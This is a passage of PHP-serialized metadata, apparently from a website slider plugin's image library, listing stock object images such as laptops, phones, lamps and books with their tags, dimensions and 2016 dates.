Turbine\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:58;a:12:{s:2:\"id\";s:3:\"117\";s:6:\"handle\";s:16:\"object_earth.png\";s:4:\"name\";s:18:\"Earth Globe Planet\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:59;a:12:{s:2:\"id\";s:2:\"88\";s:6:\"handle\";s:24:\"object_eiffeltower_2.png\";s:4:\"name\";s:13:\"Eiffeltower 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"700\";s:6:\"height\";s:3:\"700\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:60;a:12:{s:2:\"id\";s:2:\"87\";s:6:\"handle\";s:21:\"object_notebook_1.png\";s:4:\"name\";s:11:\"Notebook PC\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:61;a:12:{s:2:\"id\";s:2:\"86\";s:6:\"handle\";s:20:\"object_macbook_1.png\";s:4:\"name\";s:20:\"Apple Macbook Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:62;a:12:{s:2:\"id\";s:2:\"85\";s:6:\"handle\";s:18:\"object_canon_2.png\";s:4:\"name\";s:21:\"Canon Camera DSLR Top\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:63;a:12:{s:2:\"id\";s:2:\"84\";s:6:\"handle\";s:19:\"object_iphone_3.png\";s:4:\"name\";s:25:\"Apple iPhone Silver White\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:64;a:12:{s:2:\"id\";s:2:\"83\";s:6:\"handle\";s:18:\"object_candy_2.png\";s:4:\"name\";s:15:\"Candy Colored 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:65;a:12:{s:2:\"id\";s:2:\"82\";s:6:\"handle\";s:21:\"object_macmouse_1.png\";s:4:\"name\";s:15:\"Apple Mac Mouse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:66;a:12:{s:2:\"id\";s:2:\"81\";s:6:\"handle\";s:19:\"object_iphone_1.png\";s:4:\"name\";s:18:\"Apple iPhone Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:67;a:12:{s:2:\"id\";s:2:\"80\";s:6:\"handle\";s:17:\"object_deco_1.png\";s:4:\"name\";s:17:\"White Deco Object\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:68;a:12:{s:2:\"id\";s:2:\"79\";s:6:\"handle\";s:23:\"object_applewatch_1.png\";s:4:\"name\";s:24:\"Apple Watch White Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:69;a:12:{s:2:\"id\";s:2:\"78\";s:6:\"handle\";s:23:\"object_swissknife_1.png\";s:4:\"name\";s:11:\"Swiss Knife\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:70;a:12:{s:2:\"id\";s:2:\"77\";s:6:\"handle\";s:23:\"object_applewatch_2.png\";s:4:\"name\";s:17:\"Apple Watch Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:71;a:12:{s:2:\"id\";s:2:\"76\";s:6:\"handle\";s:18:\"object_candy_1.png\";s:4:\"name\";s:13:\"Candy Colored\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:72;a:12:{s:2:\"id\";s:2:\"75\";s:6:\"handle\";s:17:\"object_ipad_1.png\";s:4:\"name\";s:16:\"Apple iPad Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:73;a:12:{s:2:\"id\";s:2:\"74\";s:6:\"handle\";s:17:\"object_lamp_2.png\";s:4:\"name\";s:15:\"Black Desk Lamp\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:74;a:12:{s:2:\"id\";s:2:\"73\";s:6:\"handle\";s:18:\"object_canon_1.png\";s:4:\"name\";s:17:\"Canon Camera DLSR\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:75;a:12:{s:2:\"id\";s:2:\"72\";s:6:\"handle\";s:23:\"object_blackberry_2.png\";s:4:\"name\";s:12:\"Blackberry 3\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:76;a:12:{s:2:\"id\";s:2:\"71\";s:6:\"handle\";s:19:\"object_iphone_2.png\";s:4:\"name\";s:19:\"Apple iPhone Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:77;a:12:{s:2:\"id\";s:2:\"70\";s:6:\"handle\";s:17:\"object_ipad_2.png\";s:4:\"name\";s:15:\"Apple iPad Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:78;a:12:{s:2:\"id\";s:2:\"69\";s:6:\"handle\";s:20:\"object_printer_1.png\";s:4:\"name\";s:7:\"Printer\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:79;a:12:{s:2:\"id\";s:2:\"68\";s:6:\"handle\";s:20:\"object_pcmouse_1.png\";s:4:\"name\";s:14:\"Black PC Mouse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:80;a:12:{s:2:\"id\";s:2:\"67\";s:6:\"handle\";s:17:\"object_ipad_3.png\";s:4:\"name\";s:17:\"Apple iPad Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:81;a:12:{s:2:\"id\";s:2:\"66\";s:6:\"handle\";s:17:\"object_lamp_1.png\";s:4:\"name\";s:13:\"Desk Lamp Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:82;a:12:{s:2:\"id\";s:2:\"65\";s:6:\"handle\";s:22:\"object_macscreen_1.png\";s:4:\"name\";s:16:\"Apple Mac Screen\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:83;a:12:{s:2:\"id\";s:2:\"64\";s:6:\"handle\";s:23:\"object_blackberry_3.png\";s:4:\"name\";s:12:\"Blackberry 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:84;a:12:{s:2:\"id\";s:2:\"63\";s:6:\"handle\";s:23:\"object_applewatch_3.png\";s:4:\"name\";s:16:\"Apple Watch Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:85;a:12:{s:2:\"id\";s:2:\"62\";s:6:\"handle\";s:23:\"object_blackberry_1.png\";s:4:\"name\";s:10:\"Blackberry\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:86;a:12:{s:2:\"id\";s:2:\"49\";s:6:\"handle\";s:19:\"object_bottle_1.png\";s:4:\"name\";s:18:\"Brown Glass Bottle\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:87;a:12:{s:2:\"id\";s:2:\"48\";s:6:\"handle\";s:20:\"object_glasses_1.png\";s:4:\"name\";s:19:\"Hipster Glasses Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:88;a:12:{s:2:\"id\";s:2:\"47\";s:6:\"handle\";s:21:\"object_magazine_1.png\";s:4:\"name\";s:14:\"Blank Magazine\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:89;a:12:{s:2:\"id\";s:2:\"46\";s:6:\"handle\";s:28:\"object_leatherdocument_2.png\";s:4:\"name\";s:24:\"Black Leather Document 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:90;a:12:{s:2:\"id\";s:2:\"45\";s:6:\"handle\";s:18:\"object_purse_2.png\";s:4:\"name\";s:13:\"Black Purse 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:91;a:12:{s:2:\"id\";s:2:\"44\";s:6:\"handle\";s:23:\"object_typewriter_1.png\";s:4:\"name\";s:18:\"Retro Typewriter 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:92;a:12:{s:2:\"id\";s:2:\"43\";s:6:\"handle\";s:17:\"object_book_5.png\";s:4:\"name\";s:9:\"Old Books\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:93;a:12:{s:2:\"id\";s:2:\"42\";s:6:\"handle\";s:28:\"object_leatherdocument_1.png\";s:4:\"name\";s:29:\"Black Leather Document Closed\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:94;a:12:{s:2:\"id\";s:2:\"41\";s:6:\"handle\";s:17:\"object_book_4.png\";s:4:\"name\";s:8:\"Old Book\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:95;a:12:{s:2:\"id\";s:2:\"40\";s:6:\"handle\";s:19:\"object_wallet_2.png\";s:4:\"name\";s:22:\"Black Leather Document\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:96;a:12:{s:2:\"id\";s:2:\"39\";s:6:\"handle\";s:18:\"object_quill_2.png\";s:4:\"name\";s:15:\"Quill Feather 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:97;a:12:{s:2:\"id\";s:2:\"38\";s:6:\"handle\";s:24:\"object_eiffeltower_1.png\";s:4:\"name\";s:11:\"Eiffeltower\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:98;a:12:{s:2:\"id\";s:2:\"37\";s:6:\"handle\";s:21:\"object_magazine_2.png\";s:4:\"name\";s:11:\"Open Book 3\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New 